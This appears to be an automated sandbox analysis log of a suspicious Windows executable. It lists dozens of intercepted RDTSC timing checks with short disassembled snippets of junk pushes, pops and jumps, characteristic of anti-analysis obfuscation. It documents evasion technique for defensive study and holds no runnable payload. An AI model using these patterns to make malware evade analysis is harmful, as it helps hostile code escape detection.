Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 379C60 second address: 379C66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 37A31A second address: 37A320 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 37A320 second address: 37A325 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 37A381 second address: 37A385 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 37A658 second address: 37A66E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jbe 00007F3A9502B5ECh 0x00000010 jng 00007F3A9502B5E6h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 37A6F3 second address: 37A6F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 37A6F8 second address: 37A70D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push esi 0x00000006 pop esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jnl 00007F3A9502B5E6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 37A70D second address: 37A711 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 37A711 second address: 37A717 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 37A717 second address: 37A725 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3A94CD407Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 37AE89 second address: 37AE8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 37AE8D second address: 37AF3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F3A94CD4084h 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f call 00007F3A94CD4083h 0x00000014 mov di, dx 0x00000017 pop edi 0x00000018 movzx edi, ax 0x0000001b push 00000000h 0x0000001d call 00007F3A94CD407Ah 0x00000022 jmp 00007F3A94CD4081h 0x00000027 pop esi 0x00000028 jmp 00007F3A94CD4089h 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push eax 0x00000032 call 00007F3A94CD4078h 0x00000037 pop eax 0x00000038 mov dword ptr [esp+04h], eax 0x0000003c add dword ptr [esp+04h], 0000001Ah 0x00000044 inc eax 0x00000045 push eax 0x00000046 ret 0x00000047 pop eax 0x00000048 ret 0x00000049 xchg eax, ebx 0x0000004a jmp 00007F3A94CD4085h 0x0000004f push eax 0x00000050 push eax 0x00000051 push edx 0x00000052 pushad 0x00000053 push eax 0x00000054 push edx 0x00000055 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 37AF3C second address: 37AF43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 37DFE7 second address: 37DFF5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pushad 0x0000000c popad 0x0000000d pop edi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 37DFF5 second address: 37E073 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A9502B5F8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push edi 0x0000000d call 00007F3A9502B5E8h 0x00000012 pop edi 0x00000013 mov dword ptr [esp+04h], edi 0x00000017 add dword ptr [esp+04h], 0000001Dh 0x0000001f inc edi 0x00000020 push edi 0x00000021 ret 0x00000022 pop edi 0x00000023 ret 0x00000024 mov dword ptr [ebp+122D1CD2h], edi 0x0000002a push 00000000h 0x0000002c cld 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push ecx 0x00000032 call 00007F3A9502B5E8h 0x00000037 pop ecx 0x00000038 mov dword ptr [esp+04h], ecx 0x0000003c add dword ptr [esp+04h], 00000014h 0x00000044 inc ecx 0x00000045 push ecx 0x00000046 ret 0x00000047 pop ecx 0x00000048 ret 0x00000049 mov si, dx 0x0000004c push eax 0x0000004d push eax 0x0000004e push edx 0x0000004f jmp 00007F3A9502B5EFh 0x00000054 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 37E073 second address: 37E078 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 37E078 second address: 37E07E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 37EB74 second address: 37EC10 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A94CD407Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007F3A94CD4078h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 0000001Ch 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 mov esi, 07CCD72Bh 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f push eax 0x00000030 call 00007F3A94CD4078h 0x00000035 pop eax 0x00000036 mov dword ptr [esp+04h], eax 0x0000003a add dword ptr [esp+04h], 0000001Dh 0x00000042 inc eax 0x00000043 push eax 0x00000044 ret 0x00000045 pop eax 0x00000046 ret 0x00000047 call 00007F3A94CD407Bh 0x0000004c mov dword ptr [ebp+122D20B7h], esi 0x00000052 pop esi 0x00000053 mov dword ptr [ebp+122D2F63h], ebx 0x00000059 push 00000000h 0x0000005b mov dword ptr [ebp+122D2ED4h], eax 0x00000061 xchg eax, ebx 0x00000062 push eax 0x00000063 push edx 0x00000064 jmp 00007F3A94CD4087h 0x00000069 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 37E989 second address: 37E997 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 37EC10 second address: 37EC15 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 380A38 second address: 380AD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jp 00007F3A9502B5E6h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f mov dword ptr [ebp+12453EBEh], ebx 0x00000015 mov dword ptr [ebp+122D29C3h], edx 0x0000001b push 00000000h 0x0000001d push 00000000h 0x0000001f push esi 0x00000020 call 00007F3A9502B5E8h 0x00000025 pop esi 0x00000026 mov dword ptr [esp+04h], esi 0x0000002a add dword ptr [esp+04h], 00000017h 0x00000032 inc esi 0x00000033 push esi 0x00000034 ret 0x00000035 pop esi 0x00000036 ret 0x00000037 mov dword ptr [ebp+124553D3h], edi 0x0000003d push 00000000h 0x0000003f push 00000000h 0x00000041 push ebx 0x00000042 call 00007F3A9502B5E8h 0x00000047 pop ebx 0x00000048 mov dword ptr [esp+04h], ebx 0x0000004c add dword ptr [esp+04h], 0000001Dh 0x00000054 inc ebx 0x00000055 push ebx 0x00000056 ret 0x00000057 pop ebx 0x00000058 ret 0x00000059 jmp 00007F3A9502B5F8h 0x0000005e jmp 00007F3A9502B5EBh 0x00000063 xchg eax, ebx 0x00000064 push eax 0x00000065 push edx 0x00000066 jmp 00007F3A9502B5EBh 0x0000006b rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 380AD2 second address: 380AD8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 380AD8 second address: 380ADC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 37FCFD second address: 37FD03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 37FD03 second address: 37FD07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 37FD07 second address: 37FD0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 381598 second address: 38159C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 37FD0B second address: 37FD3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jno 00007F3A94CD407Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F3A94CD4089h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 38159C second address: 3815A6 instructions: 0x00000000 rdtsc 0x00000002 je 00007F3A9502B5E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3815A6 second address: 3815AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3815AC second address: 3815B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3815B0 second address: 3815B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3815B4 second address: 38160E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b jmp 00007F3A9502B5F1h 0x00000010 jns 00007F3A9502B5E6h 0x00000016 push 00000000h 0x00000018 mov esi, dword ptr [ebp+122D1BFBh] 0x0000001e push 00000000h 0x00000020 push 00000000h 0x00000022 push edx 0x00000023 call 00007F3A9502B5E8h 0x00000028 pop edx 0x00000029 mov dword ptr [esp+04h], edx 0x0000002d add dword ptr [esp+04h], 00000019h 0x00000035 inc edx 0x00000036 push edx 0x00000037 ret 0x00000038 pop edx 0x00000039 ret 0x0000003a push eax 0x0000003b push eax 0x0000003c push edx 0x0000003d pushad 0x0000003e pushad 0x0000003f popad 0x00000040 jc 00007F3A9502B5E6h 0x00000046 popad 0x00000047 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 385120 second address: 385124 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 381E9B second address: 381EA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F3A9502B5E6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 385124 second address: 38512A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 38661B second address: 38661F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3857EE second address: 3857F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 38661F second address: 386625 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3857F4 second address: 3857F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3857F8 second address: 38589A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a je 00007F3A9502B5E8h 0x00000010 push edx 0x00000011 pop edx 0x00000012 jg 00007F3A9502B5E8h 0x00000018 pushad 0x00000019 popad 0x0000001a popad 0x0000001b nop 0x0000001c jmp 00007F3A9502B5EDh 0x00000021 push dword ptr fs:[00000000h] 0x00000028 movzx edi, cx 0x0000002b mov dword ptr fs:[00000000h], esp 0x00000032 mov dword ptr [ebp+122D2E7Ch], ebx 0x00000038 mov eax, dword ptr [ebp+122D1005h] 0x0000003e push 00000000h 0x00000040 push ebx 0x00000041 call 00007F3A9502B5E8h 0x00000046 pop ebx 0x00000047 mov dword ptr [esp+04h], ebx 0x0000004b add dword ptr [esp+04h], 0000001Ch 0x00000053 inc ebx 0x00000054 push ebx 0x00000055 ret 0x00000056 pop ebx 0x00000057 ret 0x00000058 mov edi, dword ptr [ebp+122D2C82h] 0x0000005e push FFFFFFFFh 0x00000060 add bl, 0000001Ch 0x00000063 nop 0x00000064 pushad 0x00000065 jmp 00007F3A9502B5F7h 0x0000006a push eax 0x0000006b push edx 0x0000006c jmp 00007F3A9502B5F2h 0x00000071 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3867E4 second address: 3867F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3A94CD407Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3867F4 second address: 3867F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3867F8 second address: 38680B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c jg 00007F3A94CD4076h 0x00000012 pop edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 38680B second address: 386827 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3A9502B5F8h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 388738 second address: 38873C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 38873C second address: 388742 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3877ED second address: 3877F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3C0022 second address: 3C0040 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F3A94CD4080h 0x0000000b popad 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f pop edx 0x00000010 push edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3C0040 second address: 3C0046 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3C0046 second address: 3C005F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 jng 00007F3A94CD40A9h 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 jc 00007F3A94CD4076h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3C005F second address: 3C0068 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3C0068 second address: 3C006E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3C01B8 second address: 3C01BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3C030E second address: 3C031C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 jng 00007F3A94CD4076h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3C031C second address: 3C0325 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3C0325 second address: 3C032B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3C032B second address: 3C0348 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3A9502B5F9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3C0348 second address: 3C034C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3C2F93 second address: 3C2FB5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F3A9502B5F1h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jo 00007F3A9502B5E6h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3C2FB5 second address: 3C2FB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3C2FB9 second address: 3C2FC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3C2B1F second address: 3C2B23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3C2B23 second address: 3C2B41 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A9502B5F2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jns 00007F3A9502B5F2h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3C2B41 second address: 3C2B4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F3A94CD4076h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3C2B4B second address: 3C2B5C instructions: 0x00000000 rdtsc 0x00000002 jg 00007F3A9502B5ECh 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3C5A8C second address: 3C5A90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3C5A90 second address: 3C5AD2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F3A9502B5F2h 0x0000000c jp 00007F3A9502B5E6h 0x00000012 push eax 0x00000013 pop eax 0x00000014 popad 0x00000015 jns 00007F3A9502B5F9h 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3C5AD2 second address: 3C5AF9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A94CD4088h 0x00000007 jmp 00007F3A94CD407Bh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3CCA32 second address: 3CCA36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3CCA36 second address: 3CCAA5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F3A94CD407Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b ja 00007F3A94CD408Ah 0x00000011 jmp 00007F3A94CD407Ah 0x00000016 jmp 00007F3A94CD407Ah 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F3A94CD4088h 0x00000023 pushad 0x00000024 jns 00007F3A94CD4076h 0x0000002a jmp 00007F3A94CD4080h 0x0000002f jmp 00007F3A94CD407Fh 0x00000034 popad 0x00000035 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 37900A second address: 379031 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 ja 00007F3A9502B5E6h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e jmp 00007F3A9502B5F6h 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3D033A second address: 3D0340 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3D0340 second address: 3D0344 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3D0344 second address: 3D0377 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F3A94CD4089h 0x0000000d jmp 00007F3A94CD4082h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3D0377 second address: 3D037B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3D04D2 second address: 3D04FA instructions: 0x00000000 rdtsc 0x00000002 je 00007F3A94CD4076h 0x00000008 jmp 00007F3A94CD4086h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jnc 00007F3A94CD4078h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3D04FA second address: 3D053A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A9502B5F5h 0x00000007 jmp 00007F3A9502B5EFh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jno 00007F3A9502B602h 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 push edx 0x00000018 pop edx 0x00000019 jg 00007F3A9502B5E6h 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 push esi 0x00000023 pop esi 0x00000024 pushad 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3D3DCC second address: 3D3DD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3D3DD0 second address: 3D3DDF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A9502B5EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
